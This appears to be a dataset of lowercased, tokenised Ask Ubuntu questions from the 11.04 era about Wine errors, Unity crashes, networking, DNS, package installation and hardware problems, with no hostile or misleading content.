39878	wine problem ole error	i just setup wine in my ubuntu desktop , tried to install an application and got some error : ~/desktop $ wine ./setup.exe fixme : msg : changewindowmessagefilter c054 00000001 fixme : win : disableprocesswindowsghosting : stub fixme : win : winnlsenableime hunknown1 0x1009c bunknown2 0 : stub ! fixme : win : winnlsenableime hunknown1 0x1009c bunknown2 -1 : stub ! fixme : win : winnlsenableime hunknown1 0x100a8 bunknown2 0 : stub ! fixme : win : winnlsenableime hunknown1 0x100a8 bunknown2 -1 : stub ! fixme : win : winnlsenableime hunknown1 0x100a8 bunknown2 0 : stub ! fixme : win : winnlsenableime hunknown1 0x100a8 bunknown2 -1 : stub ! fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 0 : stub ! err : ole : cogetclassobject class { 56fdf344-fd6d-11d0-958a-006097c9a090 } not registered err : ole : cogetclassobject no class object { 56fdf344-fd6d-11d0-958a-006097c9a090 } could be created for context 0x1 fixme : sfc : sfcisfileprotected ( ( nil ) , l '' c : \\program files\\20d\\unins000.exe '' ) stub err : ole : cogetclassobject class { 00021401-0000-0000-c000-000000000046 } not registered err : ole : create_server class { 00021401-0000-0000-c000-000000000046 } not registered err : ole : cogetclassobject no class object { 00021401-0000-0000-c000-000000000046 } could be created for context 0x5 fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 -1 : stub ! fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 0 : stub ! err : ole : cogetclassobject class { 00021401-0000-0000-c000-000000000046 } not registered err : ole : create_server class { 00021401-0000-0000-c000-000000000046 } not registered err : ole : cogetclassobject no class object { 00021401-0000-0000-c000-000000000046 } could be created for context 0x5 fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 -1 : stub ! fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 0 : stub ! err : ole : cogetclassobject class { 00021401-0000-0000-c000-000000000046 } not registered err : ole : create_server class { 00021401-0000-0000-c000-000000000046 } not registered err : ole : cogetclassobject no class object { 00021401-0000-0000-c000-000000000046 } could be created for context 0x5 fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 -1 : stub ! fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 0 : stub ! fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 -1 : stub ! fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 0 : stub ! fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 -1 : stub ! fixme : ole : dllregisterserver stub fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 0 : stub ! fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 -1 : stub ! fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 0 : stub ! fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 -1 : stub ! fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 0 : stub ! fixme : win : winnlsenableime hunknown1 0x100a6 bunknown2 -1 : stub ! ubuntu @ ip-10-130-85-39 : ~/desktop $ fixme : ole : oleloadpictureex ( 0x95e854,26702,0 , { 7bf80980-bf32-101a-8bbb-00aa00300cab } , x=0 , y=0 , f=0,0x33fa70 ) , partially implemented . fixme : ole : oleloadpictureex ( 0x95e854,18366,1 , { 7bf80980-bf32-101a-8bbb-00aa00300cab } , x=0 , y=0 , f=0,0x33fa40 ) , partially implemented . err : ole : cogetclassobject class { cacaf262-9370-4615-a13b-9f5539da4c0a } not registered err : ole : cogetclassobject no class object { cacaf262-9370-4615-a13b-9f5539da4c0a } could be created for context 0x1 err : ole : oleloadpictureex ipersiststream_load failed i am guessing that i need to download some library but dont know what that would be . until now i have installed msxml4 and vcrun6 using winetricks
39886	unity does n't start	every time i log in ( in ubuntu or ubuntu classic session environment ) only classic gnome loads . i installed the graphics driver ( nvidia gforce 7200 ) and tried to run unity -- replace but the screen simply freezes . running unity in debug mode gave me a pretty extensive file . these errors got my attention ( since they show up if i do n't run unity in debug mode ) : ** ( :3487 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ** ( :3487 ) : glib-gobject-critical ** : g_signal_connect_data : assertion `g_type_check_instance ( instance ) ' failed ** ( :3487 ) : critical ** : bamf_application_get_desktop_file : assertion 'bamf_is_application ( application ) ' failed ** ( :3487 ) : glib-gobject-warning ** : invalid cast from `bamfwindow ' to 'bamfapplication' the whole log file ( sorry but parts of it are in portuguese ) : compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libcore.so : no such file or directory compiz ( core ) - debug : could not stat ( ) file /usr/lib/compiz/libcore.so : no such file or directory compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libccp.so : no such file or directory backend : gconf integration : true profile : unity adding plugins initializing core options ... done window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libbailer.so : no such file or directory initializing bailer options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libdetection.so : no such file or directory initializing detection options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libcomposite.so : no such file or directory initializing composite options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libopengl.so : no such file or directory initializing opengl options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libcompiztoolbox.so : no such file or directory compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libdecor.so : no such file or directory initializing decor options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libplace.so : no such file or directory initializing place options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libimgpng.so : no such file or directory compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libmove.so : no such file or directory initializing move options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libgrid.so : no such file or directory initializing grid options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libunitymtgrabhandles.so : no such file or directory initializing unitymtgrabhandles options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libregex.so : no such file or directory compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libsnap.so : no such file or directory initializing snap options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libsession.so : no such file or directory initializing session options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libanimation.so : no such file or directory initializing animation options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libmousepoll.so : no such file or directory initializing mousepoll options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libresize.so : no such file or directory initializing resize options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libvpswitch.so : no such file or directory initializing vpswitch options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libexpo.so : no such file or directory initializing expo options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libworkarounds.so : no such file or directory initializing workarounds options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libwall.so : no such file or directory initializing wall options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libezoom.so : no such file or directory initializing ezoom options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libstaticswitcher.so : no such file or directory initializing staticswitcher options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libfade.so : no such file or directory initializing fade options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libscale.so : no such file or directory initializing scale options ... done compiz ( core ) - debug : could not stat ( ) file /home/david/.compiz-1/plugins/libunityshell.so : no such file or directory ** ( < unknown > :3487 ) : debug : unity accessibility initialization ** ( < unknown > :3487 ) : debug : shows on edge : 1 ( < unknown > :3487 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( < unknown > :3487 ) : glib-gobject-critical ** : g_signal_connect_data : assertion `g_type_check_instance ( instance ) ' failed screen geometry changed : monitor 0 ( primary ) 0x0x1280x800 unity-panel-service : nenhum processo localizado ** ( < unknown > :3487 ) : debug : panelcontroller : : added panel for monitor 0 initializing unityshell options ... done could n't find a perfect decorator match ; trying all decorators starting unity-window-decorator ** ( < unknown > :3487 ) : debug : placeentry : aplicações ** ( < unknown > :3487 ) : debug : placeentry : comandos ** ( < unknown > :3487 ) : debug : placeentry : ficheiros & pastas ** ( < unknown > :3487 ) : debug : /com/canonical/unity/applicationsplace ** ( < unknown > :3487 ) : debug : /com/canonical/unity/filesplace ** ( < unknown > :3487 ) : debug : setting to primary screen rect : x=0 y=0 w=1280 h=800 ( < unknown > :3487 ) : glib-gobject-warning ** : invalid cast from `bamfwindow ' to `bamfapplication' ** ( < unknown > :3487 ) : critical ** : bamf_application_get_desktop_file : assertion `bamf_is_application ( application ) ' failed ( < unknown > :3487 ) : glib-gobject-warning ** : invalid cast from `bamfwindow ' to `bamfapplication' ** ( < unknown > :3487 ) : critical ** : bamf_application_get_desktop_file : assertion `bamf_is_application ( application ) ' failed ( < unknown > :3487 ) : glib-gobject-warning ** : invalid cast from `bamfwindow ' to `bamfapplication' ** ( < unknown > :3487 ) : critical ** : bamf_application_get_desktop_file : assertion `bamf_is_application ( application ) ' failed ( < unknown > :3487 ) : glib-gobject-warning ** : invalid cast from `bamfwindow ' to `bamfapplication' ** ( < unknown > :3487 ) : critical ** : bamf_application_get_desktop_file : assertion `bamf_is_application ( application ) ' failed ( < unknown > :3487 ) : glib-gobject-warning ** : invalid cast from `bamfwindow ' to `bamfapplication' ** ( < unknown > :3487 ) : critical ** : bamf_application_get_desktop_file : assertion `bamf_is_application ( application ) ' failed ( < unknown > :3487 ) : glib-gobject-warning ** : invalid cast from `bamfwindow ' to `bamfapplication' ** ( < unknown > :3487 ) : critical ** : bamf_application_get_desktop_file : assertion `bamf_is_application ( application ) ' failed ( < unknown > :3487 ) : glib-gobject-warning ** : invalid cast from `bamfwindow ' to `bamfapplication' ** ( < unknown > :3487 ) : critical ** : bamf_application_get_desktop_file : assertion `bamf_is_application ( application ) ' failed ** ( < unknown > :3487 ) : debug : acquired the name com.canonical.unity.launcher on the session bus ** ( < unknown > :3487 ) : debug : indicatoradded : libapplication.so ** ( < unknown > :3487 ) : debug : indicatoradded : libsoundmenu.so ** ( < unknown > :3487 ) : debug : indicatoradded : libmessaging.so ** ( < unknown > :3487 ) : debug : indicatoradded : libdatetime.so ** ( < unknown > :3487 ) : debug : indicatoradded : libme.so ** ( < unknown > :3487 ) : debug : indicatoradded : libsession.so ( < unknown > :3487 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed setting update `` flip_left_edge '' setting update `` fullscreen_visual_bell '' ** ( < unknown > :3487 ) : debug : traychild rejected : notificação de actualização update-notifier update-notifier ** ( < unknown > :3487 ) : debug : traychild rejected : notificação de actualização update-notifier update-notifier
39888	where can i find the nautilus default icons ?	i want to change the color of the back and forward icons in nautilus but i ca n't find them anywhere . i 'm using ubuntu 11.04 with radiance theme ( i want to change the orange arrows ) . i looked in the radiance theme icons folder but did n't find them there . i 've looked in /usr/share/icons/gnome/ , /usr/share/icons/hicolor/ , and /usr/share/pixmaps . they seem to be system default icons but i have no idea where they could be hiding ... anyone ? ?
39889	will upgrading disrupt online backup software ( crashplan ) ?	has anyone had any experience upgrading to ubuntu 11.04 , and how this might affect online backup software processes ? specifically , i 'm currently running ubuntu 10.10 and using crashplan v3 . crashplan backup engine runs constantly in the background to monitor files for changes and back up accordingly . will upgrading to ubuntu 11.04 affect any of the crashplan backup process ? has anyone done this successfully ? i 'd like to upgrade to the latest and greatest ubuntu release , but not at the risk of affecting the backup , or worse , having to start from scratch again and upload the entire library !
39892	how do i use the lock-keys-applet in unity ?	i have upgraded to ubuntu 11.04 . i used to have lock-keys-applet on the panel but since now i am using unity i see no way to get it back except that i use ubuntu-classic . somebody please tell me how can i get my lock-keys-applet back in ubuntu 11.04 without using ubuntu-classic . p.s : please excuse my bad english , i am learning .
39893	how to access the sd card through my sony ericsson xperia arc phone ?	i have a sony ericsson xperia arc phone and i can not access its sd card through the usb cable provided . i have set the usb connection mode to msc yet when i connect the phone to my computer i can not see the sd card ( or anything for that matter ) . the disk utility however , does see an semc mass storage device but it says that no media was detected . i have validated that the sd card works as i removed it from the camera and plugged it into a card reader and saw all the photos and files stored on it . i have validated that the phone works as i have connected it ( in msc mode ) to my wife 's windows 7 computer . can anyone please tell me how i can access the sd card on my phone .
39894	connecting to vpn is not allowing me to open public sites simultaneously	before going into the details of the issue , i want to mention that my problem is similar to the one here : connecting to vpn prevents access to normal web sites . also there are similar discussions in this regard . as because this one is a specific issue related to the destination networks route , i am creating a new question . while i am connected to vpn , i ca n't connect to other public sites . this was happening when i was on 10.10 and now happening in 11.04 also . on win though i can access both vpn resources and public sites at the same time . from the above mentioned question , it seems i have to set up route . so that both vpn resources and public sites work at the same time . i need help to find out what are the values that i should enter as address , netmask , gateway . how to find those values ? need your help to solve this issue .
39896	libreoffice writer freezes my system - nothing appears on the terminal	when i try to open libreoffice writer it just stops loading after the progress bar moves for the first time . my panel 's clock freezes at the same time and the only way to regain control of the system is forcing a log-out ( control-alt-backspace ) . ( strangely , banshee keeps playing though ) i was about to write a rather important document ( university related ) - any help on how i can fix it or at find what might be causing it would be appreciated . edit : completely removing libreoffice and reinstalling did n't change anything . installing the ppa version found in ubuntu tweak did n't help either
39897	vlc 1.1.9 not working properly	i have installed vlc 1.1.9 on wubi installed ubuntu 11 . 04 using ubuntu software center . now when i tried playing videos in vlc ( any format ) full screen mode does n't show controls and usually does n't gets me out to window mode . it sometimes crashes to login screen . i tried the video output to 'x11 output mode ' and 'xvideo output ( xcb ) ' but the above problem persists and also bring another problem . full screen mode does n't responds always when it does , it shows the video over the desktop instead of inside the player . the only way to get ubuntu to function normally is to restart the system . i tried with not using the 'embed video in interface ' but still the same problem . vlc runs perfectly well in windows . how can i make vlc function properly on my system or i need to install another player ? my system config is : graphics : via/s3g unichrome pro igp processor : amd sempron ( tm ) processor 2800+ ram : 1 . 5 gb motherboard name : microsoft-7181 ( msi )
39899	how do i remove inbox as my search engine ?	can anyone tell me how to remove inbox as my spammed search engine . i went to tools and removed everything and it will not remove ... it will not allow me to use google or yahoo . thanks bill
39900	how to quicklist for deadbeef ?	how to add quicklist lines to deadbeef.desktop file ? because it 's my favorite music player ; )
39905	natty loves to freeze itself	i just upgraded my maverick to natty 3 days ago . it 's fun and good . i try to be familiar with unity , but the natty constantly freezes suddenly . i try another alternative , i use ubuntu classic instead of unity , and at the end my computer continues freezing suddenly and it made me really angry , i ca n't do anything except of force my computer to shut down through the power button . my laptop is compaq cq20 windows & 32bit
39911	apt-get does n't load third-party ppa 's	i have a server running ubuntu server 11.04 , and when i add a ppa via add-apt-repository , apt-get does n't load the ppa when i do apt-get update . it 's specifically this ppa i need to add , but same thing happens for all the ppa 's i 've tried . i have checked that the .list files are in fact created in /etc/apt/sources.list.d/ , and if i add the ppas ' `` string '' directly in to /etc/apt/sources.list , it still does n't work . you can see here in action that i first add the ppa and then update , but the ppa 's is not on the list of loaded archives . i have also done a s-trace something , that some guy on # ubuntu-server said i could try , and the ppa 's i add are actually shown in it and `` handled '' , but for some reason , they are still not getting `` punched in use '' . i hope somebody can help me with this . by the way , this server is originally a 10.04.1 installation that has been upgraded to 10.10 and then to 11.04 , if that can have something to do with it . thank you so far , chrisbuchholz
39912	how to completely reset desktopcouch ?	i had been experiencing some ubuntu one syncing issues that were originating with the local couchdb . the database has no important information in it , but seems to be persisting across apt-get purges . what can i do to reset couchdb and desktopcouch to the initial install state ? for whomever is wondering , the current issues i am experiencing is : value could not be retrieved . ( unauthorized : ( 'unauthorized ' , 'authentication required . ' ) ) in the services tab of the ubuntuone-control-panel . desktopcouch-service fails to start because it is receiving a 401 error from couchdb .
39913	run dns service on registered domain for global name resolution	i have a domain name mydomain.net purchased/registered for one of the cloud server ( ubuntu ) and its pointing to the server ( nslookup ) . i have installed dns ( bind ) service with the domain mydomain.net . now i 'm trying to add some host records for other cloud servers ( all has static public ip ) so that i can access them globally anywhere with the name assigned as host records in the dns . i added some hosts ( i use webmin to manage dns ) for name and ip resolution but i could not resolve their names . many times i installed & configured local dns servers with no publicly registered domain names . but i did n't not understand what the concept behind running dns for global name resolution . anybody could tell me here if it 's actually possible . edit : 1 i already added the name server like my-dns-hostname-here.mydomain.net for my dns ip 204.x.x.x and also the host record like the one below for my dns ip 204.x.x.x my-dns-hostname-here.mydomain.net mediawiki.mydomain.net when i did nslookup of above host records , it did n't resolve them edit : 2 as a procedure i 'll be adding domain mydomain.com & nameserver dns-ip-here entries in /etc/resolv.conf while doing local dns server but in the cloud dns server i did n't but the isp 's dns server ips . if i have to change it then probably i may have to restart the cloud server which i could n't do it as it is one of the production server . edit : 3 output of dig mydomain.net : i 've edited to avoid security issue ; < < > > dig 9.7.0-p1 < < > > mydomain.net ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 42599 ; ; flags : qr rd ra ; query : 1 , answer : 1 , authority : 2 , additional : 0 ; ; question section : ; mydomain.net . in a ; ; answer section : mydomain.net . 1000 in a 204.x.x.x ; ; authority section : mydomain.net . 3600 in ns dns1.stabletransit.com . mydomain.net . 3600 in ns dns2.stabletransit.com . ; ; query time : 239 msec ; ; server : 192.168.1.1 # 53 ( 192.168.1.1 ) ; ; when : wed may 4 14:29:00 2011 ; ; msg size rcvd : 104
39914	how do i change the chat and mail clients in the indicator area ?	i am new to unity thanks to my natty upgrade the other day . while i like some of the new things , i would also like to reconfigure some stuff . can i change the tray apps to use different applications ? i 'd prefer to stay with my old applications ( thunderbird , pidgin ) instead of evolution and empathy . i would really like to integrate those that i use into the tray and remove the `` references '' to the ones that i do not use . so this is 2 parts a ) how to i remove evolution/empathy from the tray ( upper right , to clarify : i already removed both from the launcher ) b ) how to get pidgin/thunderbird to have a tray icon again thanks for your help !
39922	how do you select the fastest mirror from the command line ?	i want to update my sources.list file with the fastest server from the command line in a fresh ubuntu server install . i know this is trivially easy with the gui , but there does n't seem to be a simple way to do it from from the command line ? there are two different working answers to this question below : use apt-get 's mirror : method this method asks the ubuntu server for a list of mirrors near you based on your ip , and selects one of them . the easiest alternative , with the minor downside that sometimes the closest mirror may not be the fastest . command-line foo using netselect shows you how to use the netselect tool to find the fastest recently updated servers from you -- network-wise , not geographically . use sed to replace mirrors in sources.list . the other answers , including the accepted answer , are no longer valid ( for ubuntu 11.04 and newer ) because they recommended debian packages such as netselect-apt and apt-spy which do not work with ubuntu . use sed to replace mirrors in sources.list sudo sed -i 's/us.archive.ubuntu.com/mirror.math.ucdavis.edu/ ' /etc/apt/sources.list
39924	compiz crashing after a while	i upgraded from 10.10 to 11.04 through update , and after a while the compiz crashed with the title bar and most of the windows acting up and so on , ending up with nothing else doable but reboot . after reboot it says , that there 's some errors , and i 've reboot in the fix-mode , and it wrote/noted something like `` deleted compizconfig-1 inode detected '' . after a while , it checks over all the file ( system ) and fixes and such . after the next time it happens , i can update here with some more errors . the question is , that is there a fix , or do i really have to downgrade back to 10.10 or change out the compiz ? note : i 've got intel g915 graphics , 2gb of memory , dell latitude d410 laptop in short .
39930	pencil.it firefox plugin not working	i am using firefox 4.0.1 on my 11.04 ubuntu system . i have added one plugin for firefox called pencil.it which is n't working . how to solve that ?
39938	in unity , how to tell which window is the one i want when switching ?	say i have 5 different worksheets open in calc , and i 'm trying to switch between them . as far as i can tell , i have two options : use alt-tab to switch - by looking at zoomed out versions of the windows , or double click on the calc icon in the launcher to show all the windows , zoomed out . in either case , it 's very difficult for me to know which is the right window just by looking at the general shape of the document , and the title of the individual windows do n't appear anywhere . am i doing something wrong ? is there a better way to switch between windows ? is there a way to make the titles of the windows appear under them , or inside the alt-tab window , like in windows ?
39941	how do i change the super key dash shortcut menu	in 11.04 when i press the `` super '' key it brings up a handy `` shortcuts '' menu . unfortunately , the things that have been placed in that menu are of no use to me . how can i change the `` shortcut '' menu items to the things i really want ?
39942	ask ubuntu lens not working in unity , dash	yesterday i installed ask ubuntu lens in unity but when i open it dash opens , but i never get any search result . dash always stays empty even searching for `` firefox '' . right clicking on the lens in the launcher only gives me the option ask ubuntu , nothing more . what can be the problem ?
39955	how do i install this mysql workbench package ?	i want to install mysql-workbench-gpl-5.2.33b-1ubu1010-amd64.deb on ubuntu , what is the command line to do that ? thank you .
39956	fast livecd without xserver to look up mac adresses	i have a bunch of dell inspiron netbooks here and i need to find out their mac adresses for lan and wifi . my first idea was to use a ubuntu live usb stick but this needs like 2 minutes for booting . is there an alternative way to boot into a shell from the ubuntu livecd ( usb ) or do you know another tiny distribution to allow me that ?
39960	bridge interfaces and kvm	i have an ubuntu server with and a vm using kvm . the plan is that the server and the vm have a static ip address . i tried to change /etc/network/interfaces combining some of the examples available to this # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.0.50 netmask 255.255.255.0 gateway 192.168.0.1 auto br0 iface br0 inet static address 192.168.0.51 network 192.168.0.0 netmask 255.255.255.0 gateway 192.168.0.1 bridge_ports eth0 bridge_fd 9 bridge_hello 2 bridge_maxage 12 bridge_stp off if i restart the networking eth0 has no ip address but the br0 has one . this is part of the solution but not what i need as i am not able to reach the host anymore . the vm is already configured to use br0 and this part is `` sort of working '' ... any help is really appreciated . thanks !
39962	why do n't the alt+num firefox keyboard shortcuts work ?	there is problem in firefox 4.x with alt+num shortcut ( switching between tabs ) - it just does n't work . i 'm not sure if this is a problem with my ubuntu installation ( 11.04 upgraded from 10.10 ) or this is common problem . with chromium alt+num shortcuts work .
39963	boot problems after upgrading to 11.04	after updating from maverick to natty ( complete reinstalling , without saving personal information ) , i had issues with booting . i 'll try to describe : first reboot after installation of natty , system boot normally , had no issues , works good . but when i power off my laptop , and power on it again , i have boot problems . system seems to start , ubuntu violet colors screen , then blinking cursor in top left , and then it hangs ( dont know sure if it hangs ) , but screen is completely black , and i had to hard reset the laptop . after first boot failing , and rebooting , every time i reboot - it shows me grub menu ( i dont initiate it , i run itself ) sometimes i had to reboot my laptop for 3 or more times , sometimes 10 times . sometimes it starts normal on first boot . do n't know what 's this , after system start , after rebooting several times , it shows no errors or kind of that . can anyone help me understand what 's going on ? in maverick i had no issues starting the os . hardware : hp g62-a16er with i3 processor ati mobility radeon hd 5470 switchable-graphics technology ( maybe this causes this issues ? ? ) ps sorry for my english !
39965	how to use terminal from krusader ?	when i try to run the `` start terminal here '' command i get error executing konsole -- workdir % d ! on the net i found that the reason is that i have konsole is not installed , but i do n't have root and i ca n't install here anything . i tried putting sh bash gnome-terminal but the console is not being shown and nothing happens , what can i do ? i want to start terminal from cuurect location opened in krusader
39966	how to add terminal icon to file broswer ?	id like to have terminal icon on toolbar and when i click it to have terminal executed with a current path . how to do it ?
39970	how do i look up which package brought a particular command ?	for example , there is a command `` send_arp '' , i 'm not sure which package should i uninstall if i want to remove it .
39974	fn+f2 lcd/crt display toggle stopped working in 11.04	after an upgrade from 10.10 to 11.04 fn+f2 lcd/crt display toggle button stopped working on my msi u230 light . instead , pressing fn+f2 opens dash . is there any other way to toggle between lcd/crt or reenable fn+f2 key ?
39983	drawer or other organisation for hundreds of scripts in unity launcher	i have a large number of .sh scripts for opening ssh connections to various remote machines . these .sh scripts are grouped by staging/test/production/etc in gnome i had a series of entries in the places menu , one for each type of system : places | + staging | +machine 1 | +machine 2 | +machine 3 +test | +machine 4 | +machine 5 what are my options for having this kind of layout in the unity launcher ? i suppose i 'm really looking for a drawer or similar that i can mouse over to find the correct script . if i had only a few scripts i could just pin them to the launcher one by one , but i 've got about 200 ! perhaps there is a lens for doing this ?
39991	playing dvd video stored on hard-drive	i am using movie player ( under applications - > sound and video ) to play dvd-video files that are copied on hard-drive . but it 's not playing properly . i have to give each .vob file to player to play . is there any good software that i can get from ubuntu software center , to play dvd video files that are stored in a directory . player should provide me option to select directory , and it should play then .
39993	'accept ' and 'deny ' buttons are greyed out when receiving appointment request in evolution	on ubuntu natty i 've got a weird problem using evolution . a coworker ( using outlook ) sends me an appointment request . the mail is received in evolution but the 'accept ' and 'deny ' buttons are greyed out and not clickable . instead there is a message `` searching for an existing version of this appointment '' permanently visible . i have no way of either accept or refuse the appointment . any hints ?
39998	can i use keyboard shortcuts to implement text macros ?	i know that autokey has the functionality to create text macros , but i found it very buggy , and there are no new releases coming out . ( ironahk looks to be an excellent alternative , but it is n't actually available yet . ) so i 'd like to do the following myself : map control-l to this ( yes , just type a bunch of dashes - i 'm starting simple ) - '' -- -- -- -- -- -- -- - '' can i do this via the keyboard shortcuts ? would an .sh script work best ? and if so , can you point me in the right direction for learning how to create that kind of .sh script ? if this is a silly solution , is there an alternative program that would allow me to map text macros ? thanks so much .
40004	changing email application in preferred applications to gmail ?	i 'm trying to change the preferred application for email . i have installed the package desktop-webmail , but there is no new option under system - preferences - preferred application as you would expect , infact , there is only one option there , only evolution . according to this post it should be possible to set a custom application , but no option is available . is it possible to setup gmail as preferred email app so that file - > send by email works in gnome apps ? this seems to be a dup of another post here , thing is that this works fine in 10.10 , but in 11.04 this method no longer work . my post above is meant for 11.04 and the question is still valid .
40006	unable to uninstall ubuntu installed using wubi	i 've installed ubuntu 10.04 using wubi from vista . i 'm unable to uninstall it as the uninstall.exe in ubuntu folder is n't doing anything after double-clicking . also i checked add/remove programs & there is no entry for wubi/ubuntu . please help me with this . thank you .
40011	how to let `dpkg -i` install dependencies for me ?	say , i have foo-1.2.3.deb which depends on perl and python , however , running command : dpkg -i ./foo-1.2.3.deb wo n't install these dependencies . so i must apt-get install perl python by hand . how to make dpkg -i install these dependencies for me automatically ?
40012	no firefox ( internet ) icon in dash	why i have no firefox icon in dash ( like in clean install of natty ) ? my system was updated from 10.10 ( and from 10.04 in turn ) . preferred app for internet is set to firefox . it 's my most often used application , how to fix this ? sorry my russian locale .
40014	unity dash shows up while drag-n-dropping a selection in gtk apps	if the unity dash is hidden ( using app maximized ) i make a selection in a gtk app and i drag-n-drop it , the unity dash shows up . i 'm not sure it 's a feature or a bug , but sometimes it stays there and does n't wan na disappear . the only way i could manage to hide it was to move a selection behind it and back . it behaved so when i tried it with chrome , firefox and nautilus , and it did n't with mysql workbench and netbeans ide . edit : actually i managed to stick the dash also with netbeans , had to move a tab . edit2 : filed the bug : https : //bugs.launchpad.net/ubuntu/+source/unity/+bug/777203
40018	how to restore the global application menu for chromium browser ?	i lost it since i 've added the daily updates ppa , and installed the progress bar for downloads . and now i 've removed the daily updates ppa , and installed chromium from the software center but global menu does n't show up .
40022	is there a keyboard shortcut for minimizing all windows except the active one ?	when opening programs like gimp , i find having background windows open distracting because gimp has three separate windows associated with it . it 's a burden to have to go to every other non-gimp window manually to minimize it . what i need is a keyboard shortcut in ubuntu that matches windows ' super + home shortcut . one that minimizes all windows except the active one . is it possible to achieve this behavior in ubuntu ?
40023	list of addons/extensions for gnome-shell	this list is now more or less superceded by https : //extensions.gnome.org/ where extensions can be one click installed and configured . there are several addons for gnome-shell . please help me compile a list of existiong addons i have answered my question by adding the extensions i know of as answers . since there are many extensions each single answers is still a stub . here 's a video of some of the extensions in action :
40024	how to delete directory from zip file from bash script ?	how to delete directory from zip file from bash script ?
40028	front panel audio connection not working after restart	since my hdmi audio does not work with the open source drivers ( doubt it can be fixed , google 'd everywhere ) , i have to use an audio jack ( which is fine ) . my 3.5mm connection on the back works fine ( which is where the speakers are connected to ) but the one on front panel ( part of the tower/case ) stopped working after i restarted . this is all a fresh install , but just to test it , i did another fresh install , updated , and watched a youtube video to check if the audio worked ( and it did ) , then i just normally restarted and it stops working again . i 'm using ubuntu 11.04 .
40031	how do i use a displaylink monitor ?	i 'm trying to connect an external monitor to my laptop via a displaylink usb adapter . when i plug in the usb cable , the screen turns bright green . this apparently indicates that the udflib displaylink driver is installed , and has detected the usb driver ( according to http : //libdlo.freedesktop.org/wiki/displaylink-mod ) . all of the instructions i 've read on how to configure displaylink with ubuntu involve manually editing the xorg.conf file , but it seems like ubuntu 11.04 with unity handles xorg.conf differently . from what i can tell , it either does not use it or places it in a different location . has anyone been able to get a displaylink-powered monitor working on 11.04 ?
